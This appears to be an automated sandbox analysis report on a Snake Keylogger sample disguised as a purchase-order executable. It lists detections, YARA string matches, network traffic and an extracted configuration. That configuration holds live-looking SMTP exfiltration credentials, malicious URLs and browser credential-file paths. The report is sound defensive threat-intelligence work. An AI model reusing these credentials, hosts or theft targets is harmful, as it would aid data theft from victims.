Edit tour

Windows Analysis Report
109__Purchase_Order.exe

Overview

General Information

Sample name:	109__Purchase_Order.exe
Analysis ID:	1419816
MD5:	4a14a9dedd4dfe259949539090ccc9fe
SHA1:	31d7fe0d77ef9b7d3df2f1a2865c3823b116991e
SHA256:	9fc2770fbd67c9b6f9f244ac6ac0fa8810c3d50e08c7d77b332bf1447ab77fab
Tags:	exeHUNSnakeKeylogger
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

109__Purchase_Order.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\109__Purchase_Order.exe" MD5: 4A14A9DEDD4DFE259949539090CCC9FE)

109__Purchase_Order.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\109__Purchase_Order.exe" MD5: 4A14A9DEDD4DFE259949539090CCC9FE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14782:$a1: get_encryptedPassword 0x14a78:$a2: get_encryptedUsername 0x1458e:$a3: get_timePasswordChanged 0x14689:$a4: get_passwordField 0x14798:$a5: set_encryptedPassword 0x15d9b:$a7: get_logins 0x15cfe:$a10: KeyLoggerEventArgs 0x15997:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4074742141.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x180c0:$x1: $%SMTPDV$ 0x18124:$x2: $#TheHashHere%& 0x1975f:$x3: %FTPDV$ 0x19853:$x4: $%TelegramDv$ 0x15997:$x5: KeyLoggerEventArgs 0x15cfe:$x5: KeyLoggerEventArgs 0x19783:$m2: Clipboard Logs ID 0x1994f:$m2: Screenshot Logs ID 0x19a1b:$m2: keystroke Logs ID 0x19927:$m4: \SnakeKeylogger\
00000002.00000002.4075654635.0000000003334000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe1a82:$a1: get_encryptedPassword 0x1022a2:$a1: get_encryptedPassword 0x1228c2:$a1: get_encryptedPassword 0xe1d78:$a2: get_encryptedUsername 0x102598:$a2: get_encryptedUsername 0x122bb8:$a2: get_encryptedUsername 0xe188e:$a3: get_timePasswordChanged 0x1020ae:$a3: get_timePasswordChanged 0x1226ce:$a3: get_timePasswordChanged 0xe1989:$a4: get_passwordField 0x1021a9:$a4: get_passwordField 0x1227c9:$a4: get_passwordField 0xe1a98:$a5: set_encryptedPassword 0x1022b8:$a5: set_encryptedPassword 0x1228d8:$a5: set_encryptedPassword 0xe309b:$a7: get_logins 0x1038bb:$a7: get_logins 0x123edb:$a7: get_logins 0xe2ffe:$a10: KeyLoggerEventArgs 0x10381e:$a10: KeyLoggerEventArgs 0x123e3e:$a10: KeyLoggerEventArgs
00000000.00000002.1691234350.000000000435E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xe53c0:$x1: $%SMTPDV$ 0x105be0:$x1: $%SMTPDV$ 0x126200:$x1: $%SMTPDV$ 0xe5424:$x2: $#TheHashHere%& 0x105c44:$x2: $#TheHashHere%& 0x126264:$x2: $#TheHashHere%& 0xe6a5f:$x3: %FTPDV$ 0x10727f:$x3: %FTPDV$ 0x12789f:$x3: %FTPDV$ 0xe6b53:$x4: $%TelegramDv$ 0x107373:$x4: $%TelegramDv$ 0x127993:$x4: $%TelegramDv$ 0xe2c97:$x5: KeyLoggerEventArgs 0xe2ffe:$x5: KeyLoggerEventArgs 0x1034b7:$x5: KeyLoggerEventArgs 0x10381e:$x5: KeyLoggerEventArgs 0x123ad7:$x5: KeyLoggerEventArgs 0x123e3e:$x5: KeyLoggerEventArgs 0xe6a83:$m2: Clipboard Logs ID 0xe6c4f:$m2: Screenshot Logs ID 0xe6d1b:$m2: keystroke Logs ID
00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7304	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7304	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7304	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7304	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b2b3:$a1: get_encryptedPassword 0x2b59f:$a2: get_encryptedUsername 0x2b0c9:$a3: get_timePasswordChanged 0x2b1c4:$a4: get_passwordField 0x2b2c9:$a5: set_encryptedPassword 0x2d811:$a7: get_logins 0x2d774:$a10: KeyLoggerEventArgs 0x2d40d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 109__Purchase_Order.exe PID: 7304	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2d40d:$x5: KeyLoggerEventArgs 0x2d774:$x5: KeyLoggerEventArgs 0x2e062:$x5: KeyLoggerEventArgs 0x2e396:$x5: KeyLoggerEventArgs 0x2f996:$m2: Clipboard Logs ID 0x2fa76:$m2: Screenshot Logs ID 0x2faaa:$m2: keystroke Logs ID 0x2fa62:$m4: \SnakeKeylogger\
Process Memory Space: 109__Purchase_Order.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7532	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: 109__Purchase_Order.exe PID: 7532	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2908d:$a1: get_encryptedPassword 0x29379:$a2: get_encryptedUsername 0x28ea3:$a3: get_timePasswordChanged 0x28f9e:$a4: get_passwordField 0x290a3:$a5: set_encryptedPassword 0x2b5eb:$a7: get_logins 0x2b54e:$a10: KeyLoggerEventArgs 0x2b1e7:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: 109__Purchase_Order.exe PID: 7532	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x2b1e7:$x5: KeyLoggerEventArgs 0x2b54e:$x5: KeyLoggerEventArgs 0x2be3c:$x5: KeyLoggerEventArgs 0x2c170:$x5: KeyLoggerEventArgs 0x2d770:$m2: Clipboard Logs ID 0x2d850:$m2: Screenshot Logs ID 0x2d884:$m2: keystroke Logs ID 0x2d83c:$m4: \SnakeKeylogger\
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.109__Purchase_Order.exe.442b100.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.109__Purchase_Order.exe.442b100.9.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.109__Purchase_Order.exe.442b100.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
0.2.109__Purchase_Order.exe.442b100.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.109__Purchase_Order.exe.442b100.9.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.109__Purchase_Order.exe.442b100.9.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
0.2.109__Purchase_Order.exe.444b920.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.109__Purchase_Order.exe.444b920.7.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.109__Purchase_Order.exe.444b920.7.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12b82:$a1: get_encryptedPassword 0x12e78:$a2: get_encryptedUsername 0x1298e:$a3: get_timePasswordChanged 0x12a89:$a4: get_passwordField 0x12b98:$a5: set_encryptedPassword 0x1419b:$a7: get_logins 0x140fe:$a10: KeyLoggerEventArgs 0x13d97:$a11: KeyLoggerEventArgsEventHandler
0.2.109__Purchase_Order.exe.444b920.7.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a49b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x196cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x19b00:$a4: \Orbitum\User Data\Default\Login Data 0x1ab3f:$a5: \Kometa\User Data\Default\Login Data
0.2.109__Purchase_Order.exe.444b920.7.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1372d:$s1: UnHook 0x13734:$s2: SetHook 0x1373c:$s3: CallNextHook 0x13749:$s4: _hook
0.2.109__Purchase_Order.exe.444b920.7.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x164c0:$x1: $%SMTPDV$ 0x16524:$x2: $#TheHashHere%& 0x17b5f:$x3: %FTPDV$ 0x17c53:$x4: $%TelegramDv$ 0x13d97:$x5: KeyLoggerEventArgs 0x140fe:$x5: KeyLoggerEventArgs 0x17b83:$m2: Clipboard Logs ID 0x17d4f:$m2: Screenshot Logs ID 0x17e1b:$m2: keystroke Logs ID 0x17d27:$m4: \SnakeKeylogger\
2.2.109__Purchase_Order.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.109__Purchase_Order.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.109__Purchase_Order.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.109__Purchase_Order.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler
2.2.109__Purchase_Order.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c29b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b4cd:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b900:$a4: \Orbitum\User Data\Default\Login Data 0x1c93f:$a5: \Kometa\User Data\Default\Login Data
2.2.109__Purchase_Order.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x15534:$s2: SetHook 0x1553c:$s3: CallNextHook 0x15549:$s4: _hook
2.2.109__Purchase_Order.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x34fa2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35298:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34dae:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x34ea9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x34fb8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x365bb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3651e:$a10: KeyLoggerEventArgs 0x15b97:$a11: KeyLoggerEventArgsEventHandler 0x361b7:$a11: KeyLoggerEventArgsEventHandler
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35b4d:$s1: UnHook 0x15534:$s2: SetHook 0x35b54:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35b5c:$s3: CallNextHook 0x15549:$s4: _hook 0x35b69:$s4: _hook
0.2.109__Purchase_Order.exe.444b920.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x388e0:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38944:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x39f7f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a073:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x361b7:$x5: KeyLoggerEventArgs 0x3651e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID 0x39fa3:$m2: Clipboard Logs ID 0x3a16f:$m2: Screenshot Logs ID 0x3a23b:$m2: keystroke Logs ID 0x19b27:$m4: \SnakeKeylogger\ 0x3a147:$m4: \SnakeKeylogger\
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14982:$a1: get_encryptedPassword 0x351a2:$a1: get_encryptedPassword 0x557c2:$a1: get_encryptedPassword 0x14c78:$a2: get_encryptedUsername 0x35498:$a2: get_encryptedUsername 0x55ab8:$a2: get_encryptedUsername 0x1478e:$a3: get_timePasswordChanged 0x34fae:$a3: get_timePasswordChanged 0x555ce:$a3: get_timePasswordChanged 0x14889:$a4: get_passwordField 0x350a9:$a4: get_passwordField 0x556c9:$a4: get_passwordField 0x14998:$a5: set_encryptedPassword 0x351b8:$a5: set_encryptedPassword 0x557d8:$a5: set_encryptedPassword 0x15f9b:$a7: get_logins 0x367bb:$a7: get_logins 0x56ddb:$a7: get_logins 0x15efe:$a10: KeyLoggerEventArgs 0x3671e:$a10: KeyLoggerEventArgs 0x56d3e:$a10: KeyLoggerEventArgs
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1552d:$s1: UnHook 0x35d4d:$s1: UnHook 0x5636d:$s1: UnHook 0x15534:$s2: SetHook 0x35d54:$s2: SetHook 0x56374:$s2: SetHook 0x1553c:$s3: CallNextHook 0x35d5c:$s3: CallNextHook 0x5637c:$s3: CallNextHook 0x15549:$s4: _hook 0x35d69:$s4: _hook 0x56389:$s4: _hook
0.2.109__Purchase_Order.exe.442b100.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x182c0:$x1: $%SMTPDV$ 0x38ae0:$x1: $%SMTPDV$ 0x59100:$x1: $%SMTPDV$ 0x18324:$x2: $#TheHashHere%& 0x38b44:$x2: $#TheHashHere%& 0x59164:$x2: $#TheHashHere%& 0x1995f:$x3: %FTPDV$ 0x3a17f:$x3: %FTPDV$ 0x5a79f:$x3: %FTPDV$ 0x19a53:$x4: $%TelegramDv$ 0x3a273:$x4: $%TelegramDv$ 0x5a893:$x4: $%TelegramDv$ 0x15b97:$x5: KeyLoggerEventArgs 0x15efe:$x5: KeyLoggerEventArgs 0x363b7:$x5: KeyLoggerEventArgs 0x3671e:$x5: KeyLoggerEventArgs 0x569d7:$x5: KeyLoggerEventArgs 0x56d3e:$x5: KeyLoggerEventArgs 0x19983:$m2: Clipboard Logs ID 0x19b4f:$m2: Screenshot Logs ID 0x19c1b:$m2: keystroke Logs ID
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.225, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\109__Purchase_Order.exe, Initiated: true, ProcessId: 7532, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49757

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: http://scratchdreams.tk	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.4075654635.0000000003081000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "tslogs@mksiimst.com", "Password": "EbxKZL@2", "Host": "us2.smtp.mailhostbox.com ", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: 109__Purchase_Order.exe

ReversingLabs: Detection: 39%

Machine Learning detection for sample

Source: 109__Purchase_Order.exe

Joe Sandbox ML: detected

Source: 109__Purchase_Order.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: 109__Purchase_Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ENYy.pdb source: 109__Purchase_Order.exe
Source:	Binary string: ENYy.pdbSHA256y1 source: 109__Purchase_Order.exe

Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then jmp 02F0FCD1h	2_2_02F0FA10
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then jmp 02F0EFDDh	2_2_02F0EDF0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then jmp 02F0F967h	2_2_02F0EDF0
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_02F0E310
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_02F0EB23
Source: C:\Users\user\Desktop\109__Purchase_Order.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	2_2_02F0E943

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.109__Purchase_Order.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.444b920.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.109__Purchase_Order.exe.442b100.9.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49757 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: global traffic

TCP traffic: 192.168.2.4:49757 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49736 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/102.129.152.231 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /_send_.php?TS HTTP/1.1Host: scratchdreams.tkConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
